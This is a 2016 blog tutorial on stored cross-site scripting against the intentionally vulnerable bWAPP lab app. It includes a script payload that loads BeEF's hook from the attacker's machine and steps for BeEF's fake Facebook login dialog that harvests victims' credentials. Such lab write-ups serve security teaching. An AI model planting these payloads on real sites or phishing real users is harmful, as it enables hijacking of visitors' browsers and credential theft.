Daniele Donzelli

XSS Stored with BeEF


    By Dany | Ethical Hacking | 0 comment | 24 May, 2016 | 0

    Stored XSS (or persistent XSS) is the most dangerous type of XSS. The attacker injects a script (the payload) that is permanently stored (persisted) on the vulnerable site, typically in its database.
    The malicious code executes every time a browser loads the “infected” page, so a single injection compromises every visitor without any further action by the attacker. Usually the script is inserted through a comment field on a blog or a forum post.
    For this tutorial we’ll use the bWAPP vulnerable application.
    Start the bee-box and find its IP address (open a terminal and type “ifconfig”); in my case it is 192.168.1.10. Open your browser, connect to the bee-box address, log in and choose Cross-Site Scripting – Stored (Blog).


    CHECK IF IT IS VULNERABLE

    To test whether the input field is vulnerable, we inject this script as a blog entry:

    <script>alert('XSS')</script>

    If the field is vulnerable, the browser shows an alert box that says XSS. As you can see, it does, so the field is vulnerable.

    Now log in and visit the same page from another browser: the alert box appears again, because our payload has been saved in the database and is served to every visitor, not just to the one who submitted it.

    BeEF

    A common way to exploit an XSS is BeEF (Browser Exploitation Framework). With this tool we can run many different kinds of attacks against any browser that loads our payload. You can download BeEF from the project’s site; if you use Kali Linux or another penetration-testing distribution you will find it already installed.
    When you start BeEF it prints the Hook URL, which is the script our payload will load into the victim’s browser, and the UI URL, which is the user interface panel.


    Open the user interface panel in your browser and log in; the default username and password are beef:beef (newer BeEF releases refuse to start until these are changed in config.yaml, so set your own credentials if prompted).
    On the left side we can see “Online Browsers” and “Offline Browsers”, which list the hooked browsers: the ones currently polling the BeEF server are online, the rest are offline.
    Now let’s start the attack. Get your IP address (open a terminal and type “ifconfig”) and insert it into the Hook URL in this way:

    <script src="http://192.168.1.19:3000/hook.js"></script>

    Now in bWAPP delete the script you inserted previously and add the BeEF script instead.

    Visit the “infected” page from another browser or another computer and you should see the hooked browsers appear in the panel; in my case Linux and OSX.

    Now let’s try an attack to see what BeEF can do.
    Go to the Commands tab, open the Social Engineering folder and select Pretty Theft. In Dialog Type select Facebook and click Execute.

    This command opens a fake Facebook login dialog in the victim’s browser. If the victim enters their login data, we receive it.

    If you click on the command result, you will see the victim’s credentials.

    This is just one example of what you can do with BeEF; as you can see, there are many other commands that can be executed against a hooked browser.

    VIDEO OF THIS TUTORIAL

    beef, ethicalhacking, xss, xssstored
    Dany

    I'm a tech enthusiast, I love learning and experimenting with new things. My main interests are iOS Development, Arduino and Ethical Hacking, but I also like to experiment with other languages like Python, Java, PHP and Android Development.

    © 2016 Donzelli Daniele | All Rights Reserved